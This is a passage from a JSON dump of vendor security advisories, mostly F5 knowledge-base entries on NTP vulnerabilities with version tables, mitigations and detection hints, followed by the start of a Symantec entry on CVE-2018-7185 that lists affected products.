documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "modified": "2017-09-21T23:07:00", "published": "2015-11-03T00:23:00", "href": "https://support.f5.com/csp/article/K17527", "id": "F5:K17527", "title": "NTP vulnerability CVE-2015-7705", "type": "f5", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-07-03T20:48:07", "bulletinFamily": "software", "cvelist": ["CVE-2014-9296"], "description": "\nF5 Product Development has assigned ID 497723 (BIG-IP) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Vulnerable component or feature \n---|---|---|--- \nBIG-IP LTM | None \n| 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 \n| None \nBIG-IP AAM | None | 11.4.0 - 11.6.0 | None \nBIG-IP AFM | None | 11.3.0 - 11.6.0 \n| None \nBIG-IP Analytics | None | 11.0.0 - 11.6.0 \n| None \nBIG-IP APM | None | 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 \n| None \nBIG-IP ASM | None | 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 \n| None \nBIG-IP Edge Gateway \n| None | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 \n| None \nBIG-IP GTM | None | 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 \n| None \nBIG-IP Link Controller | None \n| 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 \n \n| None \nBIG-IP PEM | None \n| 11.3.0 - 11.6.0 \n \n| None \nBIG-IP PSM | None | 11.0.0 - 11.4.1 \n10.1.0 - 10.2.4 \n| None \nBIG-IP WebAccelerator | None | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 \n| None \nBIG-IP WOM | None | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 \n| None \nARX | None | 6.0.0 - 6.4.0 \n| None \nEnterprise Manager | None | 3.0.0 - 3.1.1 \n2.1.0 - 2.3.0 \n| None \nFirePass | None | 7.0.0 \n6.0.0 - 6.1.0 | None \nBIG-IQ Cloud | None | 4.0.0 - 4.4.0 \n| None \nBIG-IQ Device | None | 4.2.0 - 4.4.0 \n| None \nBIG-IQ Security | None | 4.0.0 - 4.4.0 \n| None \nLineRate | None | 2.2.0 - 2.5.0 \n1.6.0 - 1.6.4 \n| None\n\nIf the previous table lists a version in the** Versions known to be not vulnerable **column, you can eliminate this vulnerability by upgrading to the listed version. If the listed version is older than the version you are currently running, or if the table does not list any version in the column, then no upgrade candidate currently exists.\n\nF5 is responding to this vulnerability as determined by the parameters defined in [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>).\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n", "edition": 1, "modified": "2018-02-06T01:03:00", "published": "2014-12-24T07:27:00", "id": "F5:K15933", "href": "https://support.f5.com/csp/article/K15933", "title": "NTP vulnerability CVE-2014-9296", "type": "f5", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2017-09-21T22:00:59", "bulletinFamily": "software", "cvelist": ["CVE-2015-7871"], "edition": 1, "description": "\nF5 Product Development has assigned ID 554838 (BIG-IP), ID 555233 (BIG-IQ), and ID 507785 (ARX) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H17518 on the **Diagnostics** > **Identified** > **Medium** screen.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| 12.0.0 \n11.6.0 HF 4 - 11.6.0 HF6 \n11.5.3 - 11.5.4 \n11.5.0 HF7 \n11.4.1 HF9 \n11.4.0 HF10| 12.1.0 \n11.6.0 - 11.6.0 HF3 \n11.5.1 - 11.5.2 \n11.5.0 - 11.5.0 HF6 \n11.4.1 - 11.4.1 HF8 \n11.0.0 - 11.4.0 HF9 \n10.1.0 - 10.2.4| Medium| ntpd \nBIG-IP AAM| 12.0.0 \n11.6.0 HF 4 - 11.6.0 HF6 \n11.5.3 - 11.5.4 \n11.5.0 HF7 \n11.4.1 HF9 \n11.4.0 HF10| 12.1.0 \n11.6.0 - 11.6.0 HF3 \n11.5.1 - 11.5.2 \n11.5.0 - 11.5.0 HF6 \n11.4.1 - 11.4.1 HF8 \n11.4.0 - 11.4.0 HF9| Medium| ntpd \nBIG-IP AFM| 12.0.0 \n11.6.0 HF 4 - 11.6.0 HF6 \n11.5.3 - 11.5.4 \n11.5.0 HF7 \n11.4.1 HF9 \n11.4.0 HF10| 12.1.0 \n11.6.0 - 11.6.0 HF3 \n11.5.1 - 11.5.2 \n11.5.0 - 11.5.0 HF6 \n11.4.1 - 11.4.1 HF8 \n11.3.0 - 11.4.0 HF9| Medium| ntpd \nBIG-IP Analytics| 12.0.0 \n11.6.0 HF 4 - 11.6.0 HF6 \n11.5.3 - 11.5.4 \n11.5.0 HF7 \n11.4.1 HF9 \n11.4.0 HF10| 12.1.0 \n11.6.0 - 11.6.0 HF3 \n11.5.1 - 11.5.2 \n11.5.0 - 11.5.0 HF6 \n11.4.1 - 11.4.1 HF8 \n11.0.0 - 11.4.0 HF9| Medium| ntpd \nBIG-IP APM| 12.0.0 \n11.6.0 HF 4 - 11.6.0 HF6 \n11.5.3 - 11.5.4 \n11.5.0 HF7 \n11.4.1 HF9 \n11.4.0 HF10| 12.1.0 \n11.6.0 - 11.6.0 HF3 \n11.5.1 - 11.5.2 \n11.5.0 - 11.5.0 HF6 \n11.4.1 - 11.4.1 HF8 \n11.0.0 - 11.4.0 HF9 \n10.1.0 - 10.2.4| Medium| ntpd \nBIG-IP ASM| 12.0.0 \n11.6.0 HF 4 - 11.6.0 HF6 \n11.5.3 - 11.5.4 \n11.5.0 HF7 \n11.4.1 HF9 \n11.4.0 HF10| 12.1.0 \n11.6.0 - 11.6.0 HF3 \n11.5.1 - 11.5.2 \n11.5.0 - 11.5.0 HF6 \n11.4.1 - 11.4.1 HF8 \n11.0.0 - 11.4.0 HF9 \n10.1.0 - 10.2.4| Medium| ntpd \nBIG-IP DNS| 12.0.0| 12.1.0| Medium| ntpd \nBIG-IP Edge Gateway| None| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP GTM| 11.6.0 HF 4 - 11.6.0 HF6 \n11.5.3 - 11.5.4 \n11.5.0 HF7 \n11.4.1 HF9 \n11.4.0 HF10| 11.6.0 - 11.6.0 HF3 \n11.5.1 - 11.5.2 \n11.5.0 - 11.5.0 HF6 \n11.4.1 - 11.4.1 HF8 \n11.0.0 - 11.4.0 HF9 \n10.1.0 - 10.2.4| Medium| ntpd \nBIG-IP Link Controller| 12.0.0 \n11.6.0 HF 4 - 11.6.0 HF6 \n11.5.3 - 11.5.4 \n11.5.0 HF7 \n11.4.1 HF9 \n11.4.0 HF10| 12.1.0 \n11.6.0 - 11.6.0 HF3 \n11.5.1 - 11.5.2 \n11.5.0 - 11.5.0 HF6 \n11.4.1 - 11.4.1 HF8 \n11.0.0 - 11.4.0 HF9 \n10.1.0 - 10.2.4| Medium| ntpd \nBIG-IP PEM| 12.0.0 \n11.6.0 HF 4 - 11.6.0 HF6 \n11.5.3 - 11.5.4 \n11.5.0 HF7 \n11.4.1 HF9 \n11.4.0 HF10| 12.1.0 \n11.6.0 - 11.6.0 HF3 \n11.5.1 - 11.5.2 \n11.5.0 - 11.5.0 HF6 \n11.4.1 - 11.4.1 HF8 \n11.3.0 - 11.4.0 HF9| Medium| ntpd \nBIG-IP PSM| 11.4.1 HF9 \n11.4.0 HF10| 11.4.1 - 11.4.1 HF8 \n11.0.0 - 11.4.0 HF9 \n10.1.0 - 10.2.4| Medium| ntpd \nBIG-IP WebAccelerator| None| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP WOM| None| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nARX| 6.0.0 - 6.4.0| None| Low| ntpd \nEnterprise Manager| None| 3.0.0 - 3.1.1| Not vulnerable| None \nFirePass| None| 7.0.0 \n6.0.0 - 6.1.0| Not vulnerable| None \nBIG-IQ Cloud| 4.5.0 HF3| 4.0.0 - 4.5.0 HF2| Medium| ntpd \nBIG-IQ Device| 4.5.0 HF3| 4.2.0 - 4.5.0 HF2| Medium| ntpd \nBIG-IQ Security| 4.5.0 HF3| 4.0.0 - 4.5.0 HF2| Medium| ntpd \nBIG-IQ ADC| 4.5.0 HF3| 4.5.0 - 4.5.0 HF2| Medium| ntpd \nBIG-IQ Centralized Management| 4.6.0| 5.0.0| Medium| ntpd \nBIG-IQ Cloud and Orchestration| 1.0.0| None| Medium| ntpd \nF5 iWorkflow| None| 2.0.0| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nF5 WebSafe| None| 1.0.0| Not vulnerable| None \nTraffix SDC| None| 4.0.0 - 4.4.0 \n3.3.2 - 3.5.1| Not vulnerable| None\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nMitigation \n\nStepping time too far in either the future or past on F5 systems could cause services, such as Remote Authentication (Active Directory, Kerberos) and SSL/TLS certificate validation, which are time sensitive, to have unexpected results. Stepping the time too far into the future has the potential to expire BIG-IP licenses and cause unexpected behavior in the Configuration utility.\n\nTo mitigate this vulnerability, consider the following:\n\n * Configure packet filters and/or **Port Lockdown** settings to restrict ingress NTP packets to Self IP addresses which come from untrusted sources.\n * Configure the BIG-IP AFM system to restrict access to NTP services to both the management and/or self IP addresses.\n\nFor detection of successful exploitation, consider the following:\n\n * Review the output of **ntpq -p**. If untrusted/unknown sources are listed, it is possible that an attacker has exploited this vulnerability.\n * Monitor the** /var/log/ltm** file for the message **Clock has unexpectedly adjusted by X ms**. Note that this will show up in the** /var/log/ltm **file for 11.5.0 and later. These messages alone do not indicate there is a successful exploit, just that there are clock adjustments. If the frequency of these messages appears abnormal, examine the output of **ntpq -p**.\n * Monitor the** /var/log/daemon.log **file for **ntpd** restarts and/or errors regarding time adjustments.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K13123: Managing BIG-IP product hotfixes (11.x - 13.x)](<https://support.f5.com/csp/article/K13123>)\n * [K9502: BIG-IP hotfix matrix](<https://support.f5.com/csp/article/K9502>)\n * [K15106: Managing BIG-IQ product hotfixes](<https://support.f5.com/csp/article/K15106>)\n * [K15113: BIG-IQ hotfix matrix](<https://support.f5.com/csp/article/K15113>)\n * [K10942: Installing OPSWAT hotfixes on BIG-IP APM systems](<https://support.f5.com/csp/article/K10942>)\n", "modified": "2017-09-21T21:12:00", "published": "2015-11-03T00:22:00", "id": "F5:K17518", "href": "https://support.f5.com/csp/article/K17518", "title": "NTP vulnerability CVE-2015-7871", "type": "f5", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-09-21T22:00:59", "bulletinFamily": "software", "cvelist": ["CVE-2015-7855"], "edition": 1, "description": "\nF5 Product Development has assigned ID 554845 (BIG-IP), ID 555233 (BIG-IQ), ID 555235 (Enterprise Manager), and ID 507785 (ARX) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability. Additionally, [BIG-IP iHealth](<https://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H553914-1 on the **Diagnostics** > **Identified** > **Medium** screen.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| 12.1.0 \n11.6.1| Low| ntpd \nBIG-IP AAM| 12.0.0 \n11.4.0 - 11.6.0| 12.1.0 \n11.6.1| Low| ntpd \nBIG-IP AFM| 12.0.0 \n11.3.0 - 11.6.0| 12.1.0 \n11.6.1| Low| ntpd \nBIG-IP Analytics| 12.0.0 \n11.0.0 - 11.6.0| 12.1.0 \n11.6.1| Low| ntpd \nBIG-IP APM| 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| 12.1.0 \n11.6.1| Low| ntpd \nBIG-IP ASM| 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| 12.1.0 \n11.6.1| Low| ntpd \nBIG-IP DNS| 12.0.0| 12.1.0| Low| ntpd \nBIG-IP Edge Gateway| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| None| Low| ntpd \nBIG-IP GTM| 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| 11.6.1| Low| ntpd \nBIG-IP Link Controller| 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| 12.1.0 \n11.6.1| Low| ntpd \nBIG-IP PEM| 12.0.0 \n11.3.0 - 11.6.0| 12.1.0 \n11.6.1| Low| ntpd \nBIG-IP PSM| 11.0.0 - 11.4.1 \n10.1.0 - 10.2.4| None| Low| ntpd \nBIG-IP WebAccelerator| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| None| Low| ntpd \nBIG-IP WOM| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| None| Low| ntpd \nARX| 6.0.0 - 6.4.0| None| Low| ntpd \nEnterprise Manager| 3.0.0 - 3.1.1 HF5| 3.1.1 HF6| Low| ntpd \nFirePass| None| 7.0.0 \n6.0.0 - 6.1.0| Not vulnerable| None \nBIG-IQ Cloud| 4.0.0 - 4.5.0| None| Low| ntpd \nBIG-IQ Device| 4.2.0 - 4.5.0| None| Low| ntpd \nBIG-IQ Security| 4.0.0 - 4.5.0| None| Low| ntpd \nBIG-IQ ADC| 4.5.0| None| Low| ntpd \nBIG-IQ Centralized Management| 4.6.0| 5.0.0| Low| ntpd \nBIG-IQ Cloud and Orchestration| 1.0.0| None| Low| ntpd \nF5 iWorkflow| None| 2.0.0| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nF5 WebSafe| None| 1.0.0| Not vulnerable| None \nTraffix SDC| 4.0.0 - 4.4.0 \n3.3.2 - 3.5.1| None| Low| ntpd\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nMitigation \n\nThe default configuration for the F5 products listed as vulnerable does not expose this vulnerability to any remote attack. To mitigate this vulnerability, do not enable NTP mode 7 functionality and restrict the use of mode 6 and mode 7 requests in your environment. If these features have been enabled, access control lists should be used to restrict access to remote NTP instances. In addition, you should permit access to F5 products only over a secure network and limit login access to trusted users. For more information, refer to [K13092: Overview of securing access to the BIG-IP system](<https://support.f5.com/csp/article/K13092>).\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n", "modified": "2017-09-21T21:44:00", "published": "2015-11-03T00:26:00", "href": "https://support.f5.com/csp/article/K17515", "id": "F5:K17515", "type": "f5", "title": "NTP vulnerability CVE-2015-7855", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-21T02:17:01", "bulletinFamily": "software", "cvelist": ["CVE-2015-7976"], "edition": 1, "description": "\nF5 Product Development has assigned ID 572824 (BIG-IP), ID 573411(BIG-IQ), ID 573413 (Enterprise Manager), and ID 507785 (ARX) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H21230183 on the **Diagnostics** > **Identified** > **Low** screen.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| None| Low| ntpq \nBIG-IP AAM| 12.0.0 \n11.4.0 - 11.6.0| None| Low| ntpq \nBIG-IP AFM| 12.0.0 \n11.3.0 - 11.6.0| None| Low| ntpq \nBIG-IP Analytics| 12.0.0 \n11.0.0 - 11.6.0| None| Low| ntpq \nBIG-IP APM| 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| None| Low| ntpq \nBIG-IP ASM| 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| None| Low| ntpq \nBIG-IP DNS| 12.0.0| None| Low| ntpq \nBIG-IP Edge Gateway| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| None| Low| ntpq \nBIG-IP GTM| 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| None| Low| ntpq \nBIG-IP Link Controller| 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| None| Low| ntpq \nBIG-IP PEM| 12.0.0 \n11.3.0 - 11.6.0| None| Low| ntpq \nBIG-IP PSM| 11.0.0 - 11.4.1 \n10.1.0 - 10.2.4| None| Low| ntpq \nBIG-IP WebAccelerator| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| None| Low| ntpq \nBIG-IP WOM| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| None| Low| ntpq \nARX| 6.0.0 - 6.4.0| None| Low| ntpq and ntpd \nEnterprise Manager| 3.0.0 - 3.1.1| None| Low| ntpq \nFirePass| None| 7.0.0 \n6.0.0 - 6.1.0| Not vulnerable| None \nBIG-IQ Cloud| 4.0.0 - 4.5.0| None| Low| ntpq \nBIG-IQ Device| 4.2.0 - 4.5.0| None| Low| ntpq \nBIG-IQ Security| 4.0.0 - 4.5.0| None| Low| ntpq \nBIG-IQ ADC| 4.5.0| None| Low| ntpq \nBIG-IQ Centralized Management| 4.6.0| None| Low| ntpq \nBIG-IQ Cloud and Orchestration| 1.0.0| None| Low| ntpq \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nF5 WebSafe| None| 1.0.0| Not vulnerable| None \nTraffix SDC| None| 4.0.0 - 4.4.0 \n3.3.2 - 3.5.1| Not vulnerable| None\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nFor the ntpd component\n\nBy default, the BIG-IP, BIG-IQ, or Enterprise Manager system's NTP configuration does not permit the source to query or modify the NTP service on the system. If you have modified the default NTP configuration to allow changes by remote client, you can use the directive \"restrict default nomodify\" and not allow untrusted hosts to make modifications.\n\nFor the ntpq component \n\nTo prevent a local user from exploiting this vulnerability when they are querying a remote NTP server, you can allow access to the BIG-IP or Enterprise Manager system over a secure network, and limit login access to only trusted users. For more information, refer to [K13092: Overview of securing access to the BIG-IP system](<https://support.f5.com/csp/article/K13092>).\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K13123: Managing BIG-IP product hotfixes (11.x - 13.x)](<https://support.f5.com/csp/article/K13123>)\n * [K10025: Managing BIG-IP product hotfixes (10.x)](<https://support.f5.com/csp/article/K10025>)\n * [K9502: BIG-IP hotfix matrix](<https://support.f5.com/csp/article/K9502>)\n * [K15106: Managing BIG-IQ product hotfixes](<https://support.f5.com/csp/article/K15106>)\n * [K15113: BIG-IQ hotfix matrix](<https://support.f5.com/csp/article/K15113>)\n * [K12766: ARX hotfix matrix](<https://support.f5.com/csp/article/K12766>)\n", "modified": "2017-04-04T22:20:00", "published": "2016-02-23T01:59:00", "id": "F5:K21230183", "href": "https://support.f5.com/csp/article/K21230183", "title": "NTP vulnerability CVE-2015-7976", "type": "f5", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2016-09-26T17:23:25", "bulletinFamily": "software", "cvelist": ["CVE-2015-7850"], "edition": 1, "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nA default configuration for the F5 products listed as vulnerable does not expose this vulnerability. To mitigate this vulnerability, do not enable remote configuration of NTP, and restrict access to NTP services (UDP port 123) on the management and self IP addresses.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL167: Downloading software and firmware from F5\n", "modified": "2016-08-31T00:00:00", "published": "2015-11-02T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/17000/500/sol17528.html", "id": "SOL17528", "title": "SOL17528 - NTP vulnerability CVE-2015-7850", "type": "f5", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2016-09-26T17:22:53", "bulletinFamily": "software", "cvelist": ["CVE-2015-7853"], "edition": 1, "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL4602: Overview of the F5 security vulnerability response policy\n", "modified": "2016-08-31T00:00:00", "published": "2015-11-02T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/17000/500/sol17525.html", "id": "SOL17525", "title": "SOL17525 - NTP vulnerability CVE-2015-7853", "type": "f5", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2016-12-03T05:27:49", "bulletinFamily": "software", "cvelist": ["CVE-2015-7705"], "edition": 1, "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo mitigate this vulnerability, you should limit access to the management and self IP ports, and limit login access to trusted users. For additional information, refer to SOL13092: Overview of securing access to the BIG-IP system. While there is no exposure to F5 products in the default configuration, control plane exposure may be introduced if the system is configured as an NTP server with rate limiting.\u00c2 The data plane is not vulnerable.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n", "modified": "2016-07-18T00:00:00", "published": "2015-11-02T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/17000/500/sol17527.html", "id": "SOL17527", "type": "f5", "title": "SOL17527 - NTP vulnerability CVE-2015-7705", "cvss": {"score": 0.0, "vector": "NONE"}}], "symantec": [{"lastseen": "2019-10-16T14:35:01", "bulletinFamily": "software", "cvelist": ["CVE-2018-7185"], "description": "### Description\n\nNTP is prone to a denial-of-service vulnerability. An attacker can exploit this issue to cause a denial-of-service condition, denying service to legitimate users. NTP version 4.2.6 prior to 4.2.8p11 are vulnerable.\n\n### Technologies Affected\n\n * IBM AIX 5.3 \n * IBM AIX 6.1 \n * IBM AIX 7.1 \n * IBM Aix 7.2 \n * IBM Vios 2.2.0 \n * IBM Vios 2.2.0.10 \n * IBM Vios 2.2.0.11 \n * IBM Vios 2.2.0.12 \n * IBM Vios 2.2.0.13 \n * IBM Vios 2.2.1.0 \n * IBM Vios 2.2.1.1 \n * IBM Vios 2.2.1.3 \n * IBM Vios 2.2.1.4 \n * IBM Vios 2.2.2.0 \n * IBM Vios 2.2.2.4 \n * IBM Vios 2.2.2.5 \n * IBM Vios 2.2.2.6 \n * IBM Vios 2.2.3 \n * IBM Vios 2.2.3.0 \n * IBM Vios 2.2.3.2 \n * IBM Vios 2.2.3.3 \n * IBM Vios 2.2.3.4 \n * IBM Vios 2.2.3.50 \n * IBM Vios 2.2.4.0 \n * NTP NTP 4.2.6 \n * NTP NTP 4.2.7p11 \n * NTP NTP 4.2.7p111 \n * NTP NTP 4.2.7p22 \n * NTP NTP 4.2.7p366 \n * NTP NTP 4.2.7p385 \n * NTP NTP 4.2.8 \n * NTP NTP 4.2.8p1 \n * NTP NTP 4.2.8p10 \n * NTP NTP 4.2.8p2 \n * NTP NTP 4.2.8p3 \n * NTP NTP 4.2.8p4 \n * NTP NTP 4.2.8p5 \n * NTP NTP 4.2.8p6 \n * NTP NTP 4.2.8p7 \n * NTP NTP 4.2.8p8 \n * NTP NTP 4.2.8p9 \n * Oracle Fujitsu M10-1 Server XCP 2230 \n * Oracle Fujitsu M10-1 Server XCP 2271 \n * Oracle Fujitsu M10-1 Server XCP 2280 \n * Oracle Fujitsu M10-1 Server XCP 2290 \n * Oracle Fujitsu M10-1 Server XCP 2320 \n * Oracle Fujitsu M10-1 Server XCP 2360 \n * Oracle Fujitsu M10-1 Server XCP 3050 \n * Oracle Fujitsu M10-1 Server XCP 3052 \n * Oracle Fujitsu M10-1 Server XCP 3053 \n * Oracle Fujitsu M10-1 Server XCP 3060 \n * Oracle Fujitsu M10-4 Server XCP 2230 \n * Oracle Fujitsu M10-4 Server XCP 2271 \n * Oracle Fujitsu M10-4 Server XCP 2280 \n * Oracle Fujitsu M10-4 Server XCP 2290 \n * Oracle Fujitsu M10-4 Server XCP 2320 \n * Oracle Fujitsu M10-4 Server XCP 2360 \n * Oracle Fujitsu M10-4 Server XCP 3050 \n * Oracle Fujitsu M10-4 Server XCP 3052 \n * Oracle Fujitsu M10-4 Server XCP 3053 \n * Oracle Fujitsu M10-4 Server XCP 3060 \n * Oracle Fujitsu M10-4S Server XCP 2230 \n * Oracle Fujitsu M10-4S Server XCP 2271 \n * Oracle Fujitsu M10-4S Server XCP 2280 \n * Oracle Fujitsu M10-4S Server XCP 2290 \n * Oracle Fujitsu M10-4S Server XCP 2320 \n * Oracle Fujitsu M10-4S Server XCP 2360 \n * Oracle Fujitsu M10-4S Server XCP 3050 \n * Oracle Fujitsu M10-4S Server XCP 3052 \n * Oracle Fujitsu M10-4S Server XCP 3053 \n * Oracle Fujitsu M10-4S Server XCP 3060 \n * Oracle Fujitsu M12-1 Server XCP 2230 \n * Oracle Fujitsu M12-1 Server XCP 2290 \n * Oracle Fujitsu M12-1 Server XCP 2320 \n * Oracle Fujitsu M12-1 Server XCP 2360 \n * Oracle Fujitsu M12-1 Server XCP 3000 \n * Oracle Fujitsu M12-1 Server XCP 3050 \n * Oracle Fujitsu M12-1 Server XCP 3052 \n * Oracle Fujitsu M12-1 Server XCP 3053 \n * Oracle Fujitsu M12-1 Server XCP 3060 \n * Oracle Fujitsu M12-2 Server XCP 2230 \n * Oracle Fujitsu M12-2 Server XCP 2290 \n * Oracle Fujitsu M12-2 Server XCP 2320 \n * Oracle Fujitsu M12-2 Server XCP 2360 \n * Oracle Fujitsu M12-2 Server XCP 3000 \n * Oracle Fujitsu M12-2 Server XCP 3050 \n * Oracle Fujitsu M12-2 Server XCP 3052 \n * Oracle Fujitsu M12-2 Server XCP 3053 